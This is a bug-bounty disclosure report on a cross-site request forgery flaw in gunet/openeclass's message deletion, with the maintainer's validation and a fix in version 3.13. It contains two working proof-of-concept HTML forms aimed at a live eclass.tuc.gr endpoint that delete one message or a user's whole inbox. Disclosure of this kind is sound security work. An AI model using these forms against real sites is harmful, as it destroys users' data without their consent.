We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery (CSRF) in gunet/openeclass

Valid

Reported on

Jan 2nd 2022

Description

No CSRF is provided when deleting messages.

Proof of Concept

The attacker could delete a specific message as they are generated consecutively and brute forcing it.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.eclass.tuc.gr/modules/message/ajax_handler.php" method="POST">
      <input type="hidden" name="mid" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

or the could just delete all the messages:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.eclass.tuc.gr/modules/message/ajax_handler.php" method="POST">
      <input type="hidden" name="all&#95;inbox" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

Combining this with an XSS vulnerability the attacker could force the user to delete their messages.

We are processing your report and will contact the gunet/openeclass team within 24 hours. 2 years ago
We have contacted a member of the gunet/openeclass team and are waiting to hear back 2 years ago
We have sent a follow up to the gunet/openeclass team. We will try again in 7 days. 2 years ago
We have sent a second follow up to the gunet/openeclass team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the gunet/openeclass team. This report is now considered stale. 2 years ago
Alexandros Diamantidis validated this vulnerability a year ago

Thank you for the report, and sorry for taking so long to review it! We add appropriate CSRF protection in our next release (3.13), due for release in the next couple of days.

Dimitris Angelou has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the gunet/openeclass team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the gunet/openeclass team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the gunet/openeclass team. This report is now considered stale. a year ago
Alexandros Diamantidis marked this as fixed in 3.13 with commit 14c72c a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation